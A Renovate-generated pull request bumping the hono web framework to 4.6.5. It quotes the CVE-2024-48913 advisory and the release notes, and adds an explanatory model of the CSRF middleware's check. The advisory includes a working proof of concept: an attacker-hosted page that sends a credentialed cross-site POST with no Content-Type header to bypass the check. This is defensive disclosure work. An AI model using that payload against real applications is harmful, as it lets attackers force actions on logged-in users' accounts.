beeequeue / arm-server

📃 A service for mapping Anime IDs between Database Websites
https://arm.haglund.dev/docs
GNU Affero General Public License v3.0

Update dependency hono to v4.6.5 [SECURITY] #822

Closed renovate[bot] closed 1 month ago

renovate[bot] commented 1 month ago

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| hono (source) | `4.6.4` -> `4.6.5` | age | adoption | passing | confidence |

GitHub Vulnerability Alerts

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type header.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

```js
// server.js (run with the vulnerable hono version, 4.6.4)
import { Hono } from 'hono'
import { csrf } from 'hono/csrf'

const app = new Hono()
// Default csrf(): only same-origin form-like requests should reach handlers
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  // Reached by the cross-site PoC request because it carries no Content-Type
  console.log('executed')
  return c.text(await c.req.text())
})
Deno.serve(app.fetch)
```
```html
<!-- PoC.html: served from an attacker-controlled origin and opened by a
     user who is logged in to the Hono app (cookies go along because of
     credentials: "include") -->
<script>
async function myclick() {
  // Cross-site POST to the Hono server started by server.js above.
  // A Blob with no type makes fetch() omit the Content-Type header entirely,
  // so the middleware skips its Origin check.
  await fetch("http://localhost:8000", {
    method: "POST",
    credentials: "include",
    body: new Blob([`test`], {}),
  });
}
</script>
<input type="button" onclick="myclick()" value="run" />
```

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

```js
await fetch("http://localhost:8000", { method: "POST", credentials: "include" });
```

Impact

Bypass csrf protection implemented with hono csrf middleware.


Release Notes

honojs/hono (hono)

### [v4.6.5](https://redirect.github.com/honojs/hono/releases/tag/v4.6.5)

[Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.4...v4.6.5)

#### Security fix for CSRF Protection Middleware

This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this `hono` package immediately. Before this release, a request without a `Content-Type` header can bypass the protection. This fix does not allow it.

See: https://github.com/honojs/hono/security/advisories/GHSA-2234-fmw7-43wr

#### What's Changed

- perf(types): replace intersection with union to get better perf by [@m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3443](https://redirect.github.com/honojs/hono/pull/3443)
- ci: use Deno `v2` by [@yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3506](https://redirect.github.com/honojs/hono/pull/3506)
- ci: use Deno v2 for a test running for deno by [@nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3509](https://redirect.github.com/honojs/hono/pull/3509)
- fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by [@m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3507](https://redirect.github.com/honojs/hono/pull/3507)
- fix(cors): avoid setting `Access-Control-Allow-Origin` if there is no matching origin by [@uki00a](https://redirect.github.com/uki00a) in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510)
- feat(powered-by): optional server name by [@PatrickJS](https://redirect.github.com/PatrickJS) in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492)
- fix(factory): revert PR [#3498](https://redirect.github.com/honojs/hono/issues/3498) by [@yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3515](https://redirect.github.com/honojs/hono/pull/3515)
- fix(build): remove private fields by [@nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3514](https://redirect.github.com/honojs/hono/pull/3514)

#### New Contributors

- [@uki00a](https://redirect.github.com/uki00a) made their first contribution in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510)
- [@PatrickJS](https://redirect.github.com/PatrickJS) made their first contribution in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492)

**Full Changelog**: https://github.com/honojs/hono/compare/v4.6.4...v4.6.5

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
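The bypass the advisory above describes, as an added example that is not part of this PR or of Hono's source: a minimal JavaScript model of the middleware's decision in its pre-4.6.5 and 4.6.5 forms, run over requests built the way the PoC's `fetch()` calls build them. The regexes follow the middleware's documented rules (GET and HEAD are safe; only form-like content types are subject to the Origin check); treating a missing header as `text/plain` is my reading of the fix, not quoted from it, and the victim URL, attacker origin and function names are made up. Runs on Node 18+ (global `Request` and `Blob`).

```javascript
// Added example (not Hono's code): a minimal model of the decision the csrf
// middleware makes, in its vulnerable and fixed forms, exercised against
// requests constructed the way the PoC's fetch() calls would produce them.
// Assumptions: the regexes mirror the middleware's documented behaviour
// (only GET/HEAD are safe; only form-like content types are checked), and
// the fix is modelled as "treat a missing Content-Type like text/plain".
// Victim URL, attacker origin and function names are made up. Node 18+.

const SAFE_METHOD = /^(GET|HEAD)$/
// Content types a <form> or a CORS "simple request" can carry without a
// preflight. Anything else (e.g. application/json) forces a preflight, so
// the browser already blocks it cross-site and the middleware ignores it.
const FORM_LIKE = /^\b(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/i

// Default policy of csrf(): the Origin header must equal the request's own origin.
function isAllowedOrigin(origin, requestUrl) {
  if (origin === null) return false // no Origin header: always denied
  return origin === new URL(requestUrl).origin
}

// Shared decision; `missingContentTypeAs` is what an absent header is treated as.
function shouldReject(req, missingContentTypeAs) {
  const contentType = req.headers.get('content-type') ?? missingContentTypeAs
  return (
    !SAFE_METHOD.test(req.method) &&
    FORM_LIKE.test(contentType) &&
    !isAllowedOrigin(req.headers.get('origin'), req.url)
  )
}

// Before 4.6.5 (as modelled): a missing header becomes '' which matches no
// form-like type, so the Origin check is skipped and the request goes through.
const vulnerableCsrfRejects = (req) => shouldReject(req, '')

// 4.6.5 (as modelled): a missing header is checked as if it were text/plain.
const fixedCsrfRejects = (req) => shouldReject(req, 'text/plain')

const VICTIM = 'http://localhost:8000/'      // the Hono app from the PoC
const ATTACKER = 'https://attacker.example'  // hypothetical origin serving PoC.html

// Constructed requests, as a browser would emit them for each fetch() shape.
function sampleRequests() {
  const crossSite = { origin: ATTACKER }
  return {
    // fetch(url, { method: 'POST' }) with no body: no Content-Type header at all
    noBody: new Request(VICTIM, { method: 'POST', headers: crossSite }),
    // body: new Blob(['test']) with no type: body sent, Content-Type omitted
    untypedBlob: new Request(VICTIM, { method: 'POST', headers: crossSite, body: new Blob(['test']) }),
    // body: 'test': fetch adds text/plain;charset=UTF-8, which the regex matches
    textBody: new Request(VICTIM, { method: 'POST', headers: crossSite, body: 'test' }),
    // a classic cross-site <form method="post">
    formPost: new Request(VICTIM, {
      method: 'POST',
      headers: { ...crossSite, 'content-type': 'application/x-www-form-urlencoded' },
      body: 'a=1',
    }),
    // JSON needs a CORS preflight, so the middleware leaves it alone by design
    jsonPost: new Request(VICTIM, {
      method: 'POST',
      headers: { ...crossSite, 'content-type': 'application/json' },
      body: '{}',
    }),
    // legitimate same-origin form post from the app's own page
    sameOriginForm: new Request(VICTIM, {
      method: 'POST',
      headers: { origin: new URL(VICTIM).origin, 'content-type': 'application/x-www-form-urlencoded' },
      body: 'a=1',
    }),
    // safe method: never subject to the check
    get: new Request(VICTIM, { method: 'GET', headers: crossSite }),
  }
}

// Runs both variants over every sample and returns
// { name: { contentType, vulnerableRejects, fixedRejects } }.
function evaluate() {
  const out = {}
  for (const [name, req] of Object.entries(sampleRequests())) {
    out[name] = {
      contentType: req.headers.get('content-type'),
      vulnerableRejects: vulnerableCsrfRejects(req),
      fixedRejects: fixedCsrfRejects(req),
    }
  }
  return out
}

console.table(evaluate())
```

The `contentType` column is the part worth checking: a string body gets `text/plain;charset=UTF-8` from `fetch()` and is stopped by both versions, while an untyped Blob or an empty body arrives with no header at all, and only the fixed logic subjects that request to the Origin check. The middleware deliberately ignores types such as `application/json` because those force a CORS preflight the browser already enforces, which is exactly why a header that is simply absent has to be folded into the checked set rather than the ignored one.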